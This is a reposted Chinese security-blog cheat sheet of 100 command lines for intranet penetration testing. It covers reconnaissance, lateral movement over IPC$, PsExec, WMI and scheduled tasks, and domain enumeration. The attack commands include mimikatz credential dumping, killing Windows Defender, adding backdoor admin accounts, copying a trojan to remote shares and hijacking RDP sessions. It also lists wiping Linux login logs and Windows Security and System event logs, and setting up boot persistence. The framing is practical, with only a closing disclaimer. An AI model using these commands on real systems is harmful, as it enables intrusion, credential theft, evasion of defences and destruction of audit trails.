文章总结： 本文整理了内网渗透测试中常用的100条高频命令，涵盖Windows基础信息收集、内网探测、横向移动、权限提升、域环境渗透、Linux系统操作以及痕迹清理与权限维持七大实战场景。文章提供了具体的命令示例及功能说明，旨在为攻防演练与渗透测试人员提供一份实用的操作速查手册，帮助技术人员快速执行信息收集与后续渗透步骤，具有极高的参考价值与实战指导意义。 综合评分： 85 文章分类： 内网渗透,渗透测试,红队,实战经验

内网渗透测试100条命令大全！

黑白之道

2026年2月25日 09:56 山东

内网渗透是攻防演练与渗透测试的核心环节，信息收集、权限判断、横向移动、权限维持、痕迹清理每一步都依赖原生系统命令完成。本文按Windows内网命令、Linux内网命令、域环境命令、通用内网探测、文件操作、进程服务、痕迹清理七大实战场景，整理100条高频可用命令，供参考学习。

一、Windows 内网基础信息收集

1. 1. whoami —— 查看当前登录用户
2. 2. whoami /priv —— 查看当前用户权限列表（提权关键依据）
3. 3. whoami /all —— 查看用户SID、组、权限完整信息
4. 4. hostname —— 查看主机名
5. 5. systeminfo —— 系统版本、补丁、架构、域信息
6. 6. systeminfo | findstr KB —— 快速列出已打补丁
7. 7. ipconfig /all —— 网卡、IP、网关、DNS、是否入域
8. 8. ipconfig /displaydns —— 查看本地DNS缓存
9. 9. ipconfig /flushdns —— 清空DNS缓存
10. 10. arp -a —— 内网ARP表，查看同网段存活主机
11. 11. route print —— 路由表，判断多网卡、内网网段
12. 12. netstat -ano —— 查看所有端口、连接、对应PID
13. 13. netstat -ano | findstr ":3389" —— 筛选远程桌面端口状态
14. 14. net user —— 列出本地用户
15. 15. net localgroup —— 列出本地用户组
16. 16. net localgroup administrators —— 查看本地管理员
17. 17. net config workstation —— 快速判断是否入域
18. 18. ver —— 快速查看系统版本
19. 19. wmic os get caption —— 纯净输出系统版本
20. 20. wmic qfe list —— 补丁列表（比systeminfo更干净）

二、Windows 内网探测与端口扫描

1. 1. ping -n 1 -w 100 192.168.1.1 —— 单发ping，快速探测存活
2. 2. for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr TTL —— 原生C段存活扫描
3. 3. tracert -d 目标IP —— 路由追踪（不解析域名，更快）
4. 4. net view —— 查看内网同工作组主机
5. 5. net view /domain —— 查看内网存在的域
6. 6. net share —— 查看本机开放共享
7. 7. dir \\127.0.0.1\C$ —— 测试默认管理共享（C  /ADMIN$）
8. 8. sc query —— 列出所有运行服务
9. 9. sc query winrm —— 检查WinRM远程管理状态
10. 10. sc query termservice —— 检查远程桌面服务状态
11. 11. tasklist /svc —— 进程+对应服务名
12. 12. tasklist | findstr lsass.exe —— 定位lsass进程PID

三、Windows 横向移动与远程执行

1. 1. net use \\IP\ipc$ "密码" /user:用户名 —— IPC$连接
2. 2. net use \\IP\C$ /user:域\用户名 密码 —— 挂载远程C盘
3. 3. copy 木马.exe \\IP\C$\Windows\Temp —— 远程文件上传
4. 4. psexec \\IP -u 用户名 -p 密码 cmd —— 远程获取Shell（需要管理员）
5. 5. wmic /node:IP /user:用户 /password:密码 process call create "cmd.exe" —— WMI远程执行
6. 6. sc \\IP create 服务名 binPath= "cmd.exe /c 命令" —— SC远程创建服务执行命令
7. 7. schtasks /create /s IP /u 用户 /p 密码 /tn 任务名 /tr 命令 /sc once /st 00:00 —— 计划任务远程执行
8. 8. qwinsta /server:IP —— 查看远程主机登录会话
9. 9. tscon 会话ID /dest:console /server:IP —— 远程桌面会话劫持
10. 10. reg query \\IP\HKLM\SYSTEM —— 远程读取注册表
11. 11. net start /domain —— 查看域内启动的服务
12. 12. winrm quickconfig —— 本机快速开启WinRM
13. 13. Enter-PSSession -Computer IP —— PowerShell远程连接

四、Windows 权限提升与凭据获取

1. 1. wmic product get name,version —— 查看安装软件（寻找可提权程序）
2. 2. wmic service get name,startname —— 查看服务启动账户
3. 3. icacls c:\windows\system32 —— 查看目录权限配置
4. 4. secedit /export /cfg c:\sec.cfg —— 导出本机安全策略
5. 5. net user 用户名 密码 /add —— 添加本地用户
6. 6. net localgroup administrators 用户名 /add —— 加入本地管理员
7. 7. net localgroup "Remote Desktop Users" 用户名 /add —— 开通远程桌面权限
8. 8. reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f —— 开启3389
9. 9. taskkill /f /im msmpeng.exe —— 强制结束Defender（需管理员）
10. 10. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit —— 读取内存凭据（合法授权使用）

五、Windows 域环境渗透命令

1. 1. net time /domain —— 获取域控时间，定位域控IP
2. 2. nltest /dclist:域名 —— 列出域控制器
3. 3. nltest /dsgetdc:域名 —— 获取域控信息
4. 4. net user /domain —— 列出域内所有用户
5. 5. net group /domain —— 列出域内所有组
6. 6. net group "Domain Admins" /domain —— 域管理员列表
7. 7. net group "Enterprise Admins" /domain —— 企业管理员
8. 8. net group "Domain Computers" /domain —— 域内机器
9. 9. dsquery user —— 查询域用户（域管环境）
10. 10. dsquery computer —— 查询域内机器
11. 11. dsquery group —— 查询域内用户组
12. 12. set user —— 快速查看USERDOMAIN判断域环境
13. 13. gpresult /r —— 查看域策略
14. 14. wmic ntdomain list full —— 获取域信息
15. 15. nslookup -type=SRV _ldap._tcp —— LDAP服务定位域控

六、Linux 内网渗透命令

1. 1. id —— 当前用户UID/GID/权限
2. 2. whoami —— 当前用户
3. 3. uname -a —— 内核版本（提权关键）
4. 4. cat /etc/issue —— 系统版本
5. 5. cat /etc/passwd —— 本地用户
6. 6. cat /etc/group —— 本地组
7. 7. ifconfig 或 ip a —— 网卡IP信息
8. 8. route -n —— 路由表
9. 9. arp -a —— ARP缓存
10. 10. netstat -antlp —— 端口与进程
11. 11. ps -ef —— 进程列表
12. 12. find / -perm -u=s -type f 2>/dev/null —— 查找SUID提权文件
13. 13. sudo -l —— 查看sudo权限
14. 14. cat /etc/shadow —— 密码哈希（需root）
15. 15. ssh user@IP —— 内网SSH横向

七、内网通用：文件搜索、痕迹清理、权限维持

1. 1. dir /s /b c:*.txt | findstr password —— Windows搜索含密码文件
2. 2. find / -name "*.conf" -type f 2>/dev/null —— Linux搜索配置文件
3. 3. find / -name "*.bak" -o -name "*.old" —— 搜索备份文件
4. 4. del /f /s /q %windir%\prefetch* —— 清理预读取文件
5. 5. del /f /s /q "%userprofile%\Recent*" —— 清理最近访问记录
6. 6. cls —— 清空CMD屏幕
7. 7. history -c —— Linux清空历史
8. 8. echo > /var/log/wtmp —— 清空登录日志（Linux）
9. 9. echo > /var/log/secure —— 清空SSH日志（Linux）
10. 10. schtasks /create /tn 名称 /tr 路径 /sc onstart /ru system —— 开机启动维持权限
11. 11. reg add HKLM...\Run /v 名称 /t REG_SZ /d 路径 /f —— 注册表自启动
12. 12. at 12:00 shutdown /r /t 0 —— 定时重启（测试用）
13. 13. wevtutil el —— 列出Windows日志
14. 14. wevtutil cl System —— 清空系统日志
15. 15. wevtutil cl Security —— 清空安全日志

文章来源：HACK之道

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑白之道 《内网渗透测试100条命令大全！》